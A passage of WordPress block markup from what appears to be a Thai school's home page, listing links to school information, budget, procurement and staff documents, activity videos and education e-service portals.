{\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span 